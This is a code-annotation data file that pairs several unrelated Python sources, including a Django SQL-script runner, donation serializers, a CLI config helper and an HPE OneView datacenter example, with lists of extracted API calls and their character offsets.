] | [((876, 904), 'nacl.public.SealedBox', 'public.SealedBox', (['public_key'], {}), '(public_key)\n', (892, 904), False, 'from nacl import encoding, public\n'), ((1044, 1069), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (1067, 1069), False, 'import argparse\n'), ((833, 857), 'nacl.encoding.Base64Encoder', 'encoding.Base64Encoder', ([], {}), '()\n', (855, 857), False, 'from nacl import encoding, public\n'), ((981, 1001), 'base64.b64encode', 'b64encode', (['encrypted'], {}), '(encrypted)\n', (990, 1001), False, 'from base64 import b64encode\n')] |
import datetime
import re
from django.conf import settings
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.shortcuts import redirect
from .core.sqlRunner import *
from .core.SqlRunnerThread import *
from .forms import SqlScriptForm
from .forms import RunForm
from .models import SqlScript
from .models import Run
def homepage(request):
if request.method == "POST":
print(request.FILES)
if request.FILES:
print("Files arrived to the server")
form = SqlScriptForm(request.POST, request.FILES)
if form.is_valid():
print("Valid")
sqlscript = form.save(commit=False)
sqlscript.createdby = request.user
sqlscript.save()
return redirect(scripts)
else:
form = SqlScriptForm()
return render(request, "homepage.html", { "form": form })
def scripts(request):
scripts = SqlScript.objects.all()
context = { "scripts" : scripts }
return render(request, "scripts.html", context)
def runs(request):
run_models = Run.objects.all()
context = { "run_models": run_models }
return render(request, "runs.html", context)
def create_run(request, script_id):
script = SqlScript.objects.get(pk=script_id)
form = RunForm(initial={script:script})
context = { "form" : form, "filename" : script.file.name.split('/')[-1] }
return render(request, "run.html", context)
def run(request, script_id):
script = SqlScript.objects.get(pk=script_id)
if request.method == "POST":
form = RunForm(request.POST)
if form.is_valid():
run_model = form.save(commit=False)
run_model.date = datetime.datetime.now()
run_model.user = request.user
run_model.status = "R"
run_model.script = script
run_model.save()
#trigger the script excecution
run_script(script, run_model)
#redirect to the list of runs
return redirect(runs)
else:
return render(request, "run.html", { "form": form, "filename": script.get_file_name() })
form = RunForm()
return render(request, "run.html", { "form": form, "filename": script.get_file_name() })
def run_script(script, run_model):
def success(context):
if context:
run_id = context["runid"]
rmodel = Run.objects.get(pk=run_id)
rmodel.status = "S"
rmodel.save()
def failed(context):
if context:
run_id = context["runid"]
rmodel = Run.objects.get(pk=run_id)
rmodel.status = "F"
rmodel.save()
sql = script.file.read()
conn_strings = list(map(str.strip, run_model.connstrings.split('\n')))
thread_count = 1
threads = []
for conn_string in conn_strings:
sql_runner = SqlRunner.from_sql_server_connection_string(conn_string)
runner_thread = SqlRunnerThread.from_sqlrunner(sql_runner, sql, "thread-%d" % thread_count,
"thread-%d" % thread_count,thread_count)
threads.append(runner_thread)
runner_thread.success_function = success
runner_thread.failed_function = failed
runner_thread.context = { "runid": run_model.id }
runner_thread.start()
| [
"django.shortcuts.render",
"datetime.datetime.now",
"django.shortcuts.redirect"
] | [((871, 919), 'django.shortcuts.render', 'render', (['request', '"""homepage.html"""', "{'form': form}"], {}), "(request, 'homepage.html', {'form': form})\n", (877, 919), False, 'from django.shortcuts import render\n'), ((1032, 1072), 'django.shortcuts.render', 'render', (['request', '"""scripts.html"""', 'context'], {}), "(request, 'scripts.html', context)\n", (1038, 1072), False, 'from django.shortcuts import render\n'), ((1182, 1219), 'django.shortcuts.render', 'render', (['request', '"""runs.html"""', 'context'], {}), "(request, 'runs.html', context)\n", (1188, 1219), False, 'from django.shortcuts import render\n'), ((1439, 1475), 'django.shortcuts.render', 'render', (['request', '"""run.html"""', 'context'], {}), "(request, 'run.html', context)\n", (1445, 1475), False, 'from django.shortcuts import render\n'), ((801, 818), 'django.shortcuts.redirect', 'redirect', (['scripts'], {}), '(scripts)\n', (809, 818), False, 'from django.shortcuts import redirect\n'), ((1739, 1762), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1760, 1762), False, 'import datetime\n'), ((2053, 2067), 'django.shortcuts.redirect', 'redirect', (['runs'], {}), '(runs)\n', (2061, 2067), False, 'from django.shortcuts import redirect\n')] |
# coding=utf-8
from bluebottle.utils.model_dispatcher import get_donation_model
from bluebottle.utils.serializer_dispatcher import get_serializer_class
from rest_framework import serializers
DONATION_MODEL = get_donation_model()
class ManageDonationSerializer(serializers.ModelSerializer):
project = serializers.SlugRelatedField(slug_field='slug')
fundraiser = serializers.PrimaryKeyRelatedField(required=False)
order = serializers.PrimaryKeyRelatedField()
amount = serializers.DecimalField(max_digits=10, decimal_places=2)
status = serializers.CharField(source='status', read_only=True)
class Meta:
model = DONATION_MODEL
fields = ('id', 'project', 'fundraiser', 'amount', 'status', 'order', 'anonymous', 'completed', 'created')
# FIXME Add validations for amount and project phase
class PreviewDonationSerializer(serializers.ModelSerializer):
project = get_serializer_class('PROJECTS_PROJECT_MODEL', 'preview')
fundraiser = serializers.PrimaryKeyRelatedField(required=False)
user = get_serializer_class('AUTH_USER_MODEL', 'preview')(source='public_user')
class Meta:
model = DONATION_MODEL
fields = ('id', 'project', 'fundraiser', 'user', 'created', 'anonymous', 'amount')
class DefaultDonationSerializer(PreviewDonationSerializer):
class Meta:
model = DONATION_MODEL
fields = PreviewDonationSerializer.Meta.fields + ('amount',)
| [
"bluebottle.utils.serializer_dispatcher.get_serializer_class",
"rest_framework.serializers.PrimaryKeyRelatedField",
"bluebottle.utils.model_dispatcher.get_donation_model",
"rest_framework.serializers.SlugRelatedField",
"rest_framework.serializers.DecimalField",
"rest_framework.serializers.CharField"
] | [((209, 229), 'bluebottle.utils.model_dispatcher.get_donation_model', 'get_donation_model', ([], {}), '()\n', (227, 229), False, 'from bluebottle.utils.model_dispatcher import get_donation_model\n'), ((307, 354), 'rest_framework.serializers.SlugRelatedField', 'serializers.SlugRelatedField', ([], {'slug_field': '"""slug"""'}), "(slug_field='slug')\n", (335, 354), False, 'from rest_framework import serializers\n'), ((372, 422), 'rest_framework.serializers.PrimaryKeyRelatedField', 'serializers.PrimaryKeyRelatedField', ([], {'required': '(False)'}), '(required=False)\n', (406, 422), False, 'from rest_framework import serializers\n'), ((435, 471), 'rest_framework.serializers.PrimaryKeyRelatedField', 'serializers.PrimaryKeyRelatedField', ([], {}), '()\n', (469, 471), False, 'from rest_framework import serializers\n'), ((485, 542), 'rest_framework.serializers.DecimalField', 'serializers.DecimalField', ([], {'max_digits': '(10)', 'decimal_places': '(2)'}), '(max_digits=10, decimal_places=2)\n', (509, 542), False, 'from rest_framework import serializers\n'), ((556, 610), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""status"""', 'read_only': '(True)'}), "(source='status', read_only=True)\n", (577, 610), False, 'from rest_framework import serializers\n'), ((910, 967), 'bluebottle.utils.serializer_dispatcher.get_serializer_class', 'get_serializer_class', (['"""PROJECTS_PROJECT_MODEL"""', '"""preview"""'], {}), "('PROJECTS_PROJECT_MODEL', 'preview')\n", (930, 967), False, 'from bluebottle.utils.serializer_dispatcher import get_serializer_class\n'), ((985, 1035), 'rest_framework.serializers.PrimaryKeyRelatedField', 'serializers.PrimaryKeyRelatedField', ([], {'required': '(False)'}), '(required=False)\n', (1019, 1035), False, 'from rest_framework import serializers\n'), ((1047, 1097), 'bluebottle.utils.serializer_dispatcher.get_serializer_class', 'get_serializer_class', (['"""AUTH_USER_MODEL"""', '"""preview"""'], {}), "('AUTH_USER_MODEL', 'preview')\n", (1067, 1097), False, 'from bluebottle.utils.serializer_dispatcher import get_serializer_class\n')] |
import json
import os
from .globals import CLI_GLOBALS
def __maybe_init_config():
if not os.path.exists(CLI_GLOBALS.ULTRU_CLI_CONFIG_DIR):
os.mkdir(CLI_GLOBALS.ULTRU_CLI_CONFIG_DIR)
if not os.path.exists(CLI_GLOBALS.CONFIG):
with open(CLI_GLOBALS.CONFIG, 'w') as config_fp:
json.dump({
"username": "",
"password": "",
"store_password": False
}, config_fp)
def __store_config(field, value):
__maybe_init_config()
with open(CLI_GLOBALS.CONFIG, 'r') as config_fp:
config = json.load(config_fp)
config[field] = value
with open(CLI_GLOBALS.CONFIG, 'w') as config_fp:
json.dump(config, config_fp)
def get_config_value(field):
__maybe_init_config()
with open(CLI_GLOBALS.CONFIG, 'r') as config_fp:
config = json.load(config_fp)
return config.get(field)
def list_config():
__maybe_init_config()
with open(CLI_GLOBALS.CONFIG, 'r') as config_fp:
config = json.load(config_fp)
return config
def put_config_value(field, value):
__store_config(field, value)
def store_username(username):
__store_config('username', username)
def store_password(password):
__store_config('password', password)
def set_store_password(boolean):
__store_config('store_password', boolean)
| [
"json.load",
"os.path.exists",
"os.mkdir",
"json.dump"
] | [((94, 142), 'os.path.exists', 'os.path.exists', (['CLI_GLOBALS.ULTRU_CLI_CONFIG_DIR'], {}), '(CLI_GLOBALS.ULTRU_CLI_CONFIG_DIR)\n', (108, 142), False, 'import os\n'), ((152, 194), 'os.mkdir', 'os.mkdir', (['CLI_GLOBALS.ULTRU_CLI_CONFIG_DIR'], {}), '(CLI_GLOBALS.ULTRU_CLI_CONFIG_DIR)\n', (160, 194), False, 'import os\n'), ((206, 240), 'os.path.exists', 'os.path.exists', (['CLI_GLOBALS.CONFIG'], {}), '(CLI_GLOBALS.CONFIG)\n', (220, 240), False, 'import os\n'), ((584, 604), 'json.load', 'json.load', (['config_fp'], {}), '(config_fp)\n', (593, 604), False, 'import json\n'), ((692, 720), 'json.dump', 'json.dump', (['config', 'config_fp'], {}), '(config, config_fp)\n', (701, 720), False, 'import json\n'), ((847, 867), 'json.load', 'json.load', (['config_fp'], {}), '(config_fp)\n', (856, 867), False, 'import json\n'), ((1013, 1033), 'json.load', 'json.load', (['config_fp'], {}), '(config_fp)\n', (1022, 1033), False, 'import json\n'), ((311, 390), 'json.dump', 'json.dump', (["{'username': '', 'password': '', 'store_password': False}", 'config_fp'], {}), "({'username': '', 'password': '', 'store_password': False}, config_fp)\n", (320, 390), False, 'import json\n')] |
#! /usr/bin/python3
# -*- coding: utf-8 -*-
#
# master_python_read.py
#
# Jul/31/2014
import sys
import json
#
#
sys.path.append ('/var/www/data_base/common/python_common')
from text_manipulate import dict_append_proc
# ---------------------------------------------------------------------
def data_prepare_proc ():
dict_aa = {}
dict_aa = dict_append_proc (dict_aa,'t0421','仙台',41295,'2003-8-12')
dict_aa = dict_append_proc (dict_aa,'t0422','石巻',27936,'2003-5-21')
dict_aa = dict_append_proc (dict_aa,'t0423','塩竈',19825,'2003-4-9')
dict_aa = dict_append_proc (dict_aa,'t0424','気仙沼',39256,'2003-2-25')
dict_aa = dict_append_proc (dict_aa,'t0425','白石',81452,'2003-9-12')
dict_aa = dict_append_proc (dict_aa,'t0426','名取',62397,'2003-7-26')
dict_aa = dict_append_proc (dict_aa,'t0427','多賀城',52984,'2003-10-8')
dict_aa = dict_append_proc (dict_aa,'t0428','岩沼',93612,'2003-2-12')
dict_aa = dict_append_proc (dict_aa,'t0429','大崎',89431,'2003-8-18')
#
return dict_aa
#
# ---------------------------------------------------------------------
dict_aa = data_prepare_proc ()
json_str = json.dumps (dict_aa)
#
print ("Content-type: text/json; charset=UTF-8\n\n")
#
print (json_str)
#
# ---------------------------------------------------------------------
| [
"text_manipulate.dict_append_proc",
"json.dumps",
"sys.path.append"
] | [((117, 175), 'sys.path.append', 'sys.path.append', (['"""/var/www/data_base/common/python_common"""'], {}), "('/var/www/data_base/common/python_common')\n", (132, 175), False, 'import sys\n'), ((1090, 1109), 'json.dumps', 'json.dumps', (['dict_aa'], {}), '(dict_aa)\n', (1100, 1109), False, 'import json\n'), ((345, 405), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0421"""', '"""仙台"""', '(41295)', '"""2003-8-12"""'], {}), "(dict_aa, 't0421', '仙台', 41295, '2003-8-12')\n", (361, 405), False, 'from text_manipulate import dict_append_proc\n'), ((414, 474), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0422"""', '"""石巻"""', '(27936)', '"""2003-5-21"""'], {}), "(dict_aa, 't0422', '石巻', 27936, '2003-5-21')\n", (430, 474), False, 'from text_manipulate import dict_append_proc\n'), ((483, 542), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0423"""', '"""塩竈"""', '(19825)', '"""2003-4-9"""'], {}), "(dict_aa, 't0423', '塩竈', 19825, '2003-4-9')\n", (499, 542), False, 'from text_manipulate import dict_append_proc\n'), ((551, 612), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0424"""', '"""気仙沼"""', '(39256)', '"""2003-2-25"""'], {}), "(dict_aa, 't0424', '気仙沼', 39256, '2003-2-25')\n", (567, 612), False, 'from text_manipulate import dict_append_proc\n'), ((621, 681), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0425"""', '"""白石"""', '(81452)', '"""2003-9-12"""'], {}), "(dict_aa, 't0425', '白石', 81452, '2003-9-12')\n", (637, 681), False, 'from text_manipulate import dict_append_proc\n'), ((690, 750), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0426"""', '"""名取"""', '(62397)', '"""2003-7-26"""'], {}), "(dict_aa, 't0426', '名取', 62397, '2003-7-26')\n", (706, 750), False, 'from text_manipulate import dict_append_proc\n'), ((759, 820), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0427"""', '"""多賀城"""', '(52984)', '"""2003-10-8"""'], {}), "(dict_aa, 't0427', '多賀城', 52984, '2003-10-8')\n", (775, 820), False, 'from text_manipulate import dict_append_proc\n'), ((829, 889), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0428"""', '"""岩沼"""', '(93612)', '"""2003-2-12"""'], {}), "(dict_aa, 't0428', '岩沼', 93612, '2003-2-12')\n", (845, 889), False, 'from text_manipulate import dict_append_proc\n'), ((898, 958), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0429"""', '"""大崎"""', '(89431)', '"""2003-8-18"""'], {}), "(dict_aa, 't0429', '大崎', 89431, '2003-8-18')\n", (914, 958), False, 'from text_manipulate import dict_append_proc\n')] |
# -*- coding: utf-8 -*-
###
# (C) Copyright (2012-2017) Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
###
from pprint import pprint
from config_loader import try_load_from_file
from hpOneView.oneview_client import OneViewClient
config = {
"ip": "<oneview_ip>",
"credentials": {
"userName": "<username>",
"password": "<password>"
}
}
# Try load config from a file (if there is a config file)
config = try_load_from_file(config)
oneview_client = OneViewClient(config)
datacenter_information = {
"name": "MyDatacenter",
"width": 5000, "depth": 5000
}
# Add a Datacenter
datacenter_added = oneview_client.datacenters.add(datacenter_information)
print("\nAdded Datacenter '{name}' successfully\n".format(**datacenter_added))
# Retrieve Datacenter by URI
datacenter = oneview_client.datacenters.get(datacenter_added['uri'])
print("\nGet Datacenter by URI: retrieved '{name}' successfully\n".format(**datacenter))
# Update the Datacenter
datacenter['name'] = "New Datacenter Name"
datacenter = oneview_client.datacenters.update(datacenter)
print("\nDatacenter '{name}' updated successfully\n".format(**datacenter))
# Get the Datacenter by name
datacenter_list = oneview_client.datacenters.get_by('name', "New Datacenter Name")
print("\nGet Datacenter device by name: '{name}'\n".format(**datacenter))
# Get the Datacenter visual content
print("Getting the Datacenter visual content...")
datacenter_visual_content = oneview_client.datacenters.get_visual_content(datacenter['uri'])
pprint(datacenter_visual_content)
# Remove added Datacenter
oneview_client.datacenters.remove(datacenter)
print("\nSuccessfully removed the datacenter")
# Add a datacenter again and call Remove All
datacenter_added = oneview_client.datacenters.add(datacenter_information)
oneview_client.datacenters.remove_all(filter="name matches '%'")
print("\nSuccessfully removed all datacenters")
| [
"config_loader.try_load_from_file",
"hpOneView.oneview_client.OneViewClient",
"pprint.pprint"
] | [((1485, 1511), 'config_loader.try_load_from_file', 'try_load_from_file', (['config'], {}), '(config)\n', (1503, 1511), False, 'from config_loader import try_load_from_file\n'), ((1530, 1551), 'hpOneView.oneview_client.OneViewClient', 'OneViewClient', (['config'], {}), '(config)\n', (1543, 1551), False, 'from hpOneView.oneview_client import OneViewClient\n'), ((2573, 2606), 'pprint.pprint', 'pprint', (['datacenter_visual_content'], {}), '(datacenter_visual_content)\n', (2579, 2606), False, 'from pprint import pprint\n')] |
from django.conf.urls import url
from cms_people.views.people import PersonView, PeopleView, PeopleMapResultView
urlpatterns = [
url('^people_map_result$', PeopleMapResultView.as_view(), name='people_map_result'),
url('^(?P<username>.+)$', PersonView.as_view(), name='person'),
url('^$', PeopleView.as_view(), name='people'),
] | [
"cms_people.views.people.PeopleMapResultView.as_view",
"cms_people.views.people.PersonView.as_view",
"cms_people.views.people.PeopleView.as_view"
] | [((162, 191), 'cms_people.views.people.PeopleMapResultView.as_view', 'PeopleMapResultView.as_view', ([], {}), '()\n', (189, 191), False, 'from cms_people.views.people import PersonView, PeopleView, PeopleMapResultView\n'), ((250, 270), 'cms_people.views.people.PersonView.as_view', 'PersonView.as_view', ([], {}), '()\n', (268, 270), False, 'from cms_people.views.people import PersonView, PeopleView, PeopleMapResultView\n'), ((302, 322), 'cms_people.views.people.PeopleView.as_view', 'PeopleView.as_view', ([], {}), '()\n', (320, 322), False, 'from cms_people.views.people import PersonView, PeopleView, PeopleMapResultView\n')] |